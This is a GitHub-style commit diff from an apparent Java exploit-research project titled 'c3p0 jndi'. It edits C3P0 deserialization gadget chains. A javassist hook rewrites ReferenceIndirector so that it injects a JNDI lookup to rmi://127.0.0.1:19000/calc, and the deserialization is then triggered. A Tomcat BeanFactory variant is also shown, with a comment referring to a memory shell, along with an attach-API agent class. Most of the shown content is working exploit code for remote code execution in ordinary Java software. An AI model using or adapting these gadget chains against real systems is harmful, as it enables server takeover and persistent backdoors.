c3p0 jndi

yuebusao · Aug 2, 2023 · 21df543 · 21df543
1 parent 27cb6f2
commit 21df543
Show file tree

Hide file tree

Showing 6 changed files with 27 additions and 31 deletions.
diff --git a/.idea/libraries/tools.xml b/.idea/libraries/tools.xml
diff --git a/1.txt b/1.txt
diff --git a/src/main/java/ArrayTest.java b/src/main/java/ArrayTest.java
@@ -6,14 +6,15 @@
 
 public class ArrayTest {
  public static void main(String[] args) throws Exception {
-// Class test = Class.forName("Test");
-// Object a =test.getConstructor(String.class).newInstance("a");
-//
-// Method m = test.getDeclaredMethod("DiaoWo");
-// m.setAccessible(true);
-// m.invoke(a);
-//
-// Method m1 = test.getDeclaredMethod("DiaoDiaoWo",String.class);
+ Class test = Class.forName("Test");
+ Object a =test.getConstructor(String.class).newInstance("a");
+
+ Method m = test.getDeclaredMethod("DiaoWo");
+ m.setAccessible(true);
+ m.invoke(a);
+
+
+ Method m1 = test.getDeclaredMethod("DiaoDiaoWo",String.class);
 // m1.setAccessible(true);
 // m1.invoke(a,"ws");
 //

diff --git a/src/main/java/gadget/C3P0JNDI.java b/src/main/java/gadget/C3P0JNDI.java
@@ -1,11 +1,13 @@
 package gadget;
 
 import java.io.*;
+import java.lang.reflect.Method;
 import java.sql.SQLException;
 import java.sql.SQLFeatureNotSupportedException;
 import java.util.logging.Logger;
 
 import com.mchange.v2.c3p0.PoolBackedDataSource;
+import javassist.*;
 
 import javax.naming.NamingException;
 import javax.naming.Reference;
@@ -16,10 +18,20 @@
 //C3P0无依赖JNDI
 public class C3P0JNDI {
  public static void main(String[] args) throws Exception{
- Thread.sleep(5000);//sleep一会
+// Thread.sleep(5000);//sleep一会
+ hook();
  PoolBackedDataSource a = new PoolBackedDataSource();
  a.setConnectionPoolDataSource(new PoolSource());
- writeFile("1.txt",serialize(a));
+// writeFile("1.txt",serialize(a));
+ deserialize(FiletoBytes("1.txt"));
+ }
+ public static void hook() throws ClassNotFoundException, NoSuchMethodException, NotFoundException, CannotCompileException {
+ CtClass ctClass = ClassPool.getDefault().get("com.mchange.v2.naming.ReferenceIndirector");
+ CtMethod ctMethod = ctClass.getDeclaredMethod("indirectForm");
+ ctMethod.insertBefore("java.util.Properties properties = new java.util.Properties();\n" +
+ " javax.naming.CompoundName compoundName = new javax.naming.CompoundName(\"rmi://127.0.0.1:19000/calc\",properties);" +
+ "contextName=compoundName;");
+ ctClass.toClass();
  }
 
  private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {

diff --git a/src/main/java/gadget/C3P0Tomcat.java b/src/main/java/gadget/C3P0Tomcat.java
@@ -26,25 +26,18 @@ public static void main(String[] args) throws Exception {
  C3P0Tomcat c3P0 = new C3P0Tomcat();
  Object object = c3P0.getObject();
 
- System.out.println(Base64.getEncoder().encodeToString(SerializerUtils.serialize(object)));
+// System.out.println(Base64.getEncoder().encodeToString(SerializerUtils.serialize(object)));
 
+ SerializerUtils.unserialize(SerializerUtils.serialize(object));
 // unserialize();
  }
  public Object getObject () throws Exception {
  PoolBackedDataSource b=new PoolBackedDataSource();
- ReflectionUtils.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource("org.apache.naming.factory.BeanFactory", null));
+ ReflectionUtils.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource());
  return b;
  }
  private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {
 
- private String className;
- private String url;
-
- public PoolSource ( String className, String url ) {
- this.className = className;
- this.url = url;
- }
-
  @Override
  public Reference getReference() {
  //究极内存马

diff --git a/src/main/java/gadget/agent/AgentC3P0JNDI.java b/src/main/java/gadget/agent/AgentC3P0JNDI.java
@@ -2,6 +2,7 @@
 
 import com.sun.tools.attach.VirtualMachine;
 import java.util.List;
+import com.sun.tools.*;
 import com.sun.tools.attach.VirtualMachineDescriptor;
 
 public class AgentC3P0JNDI {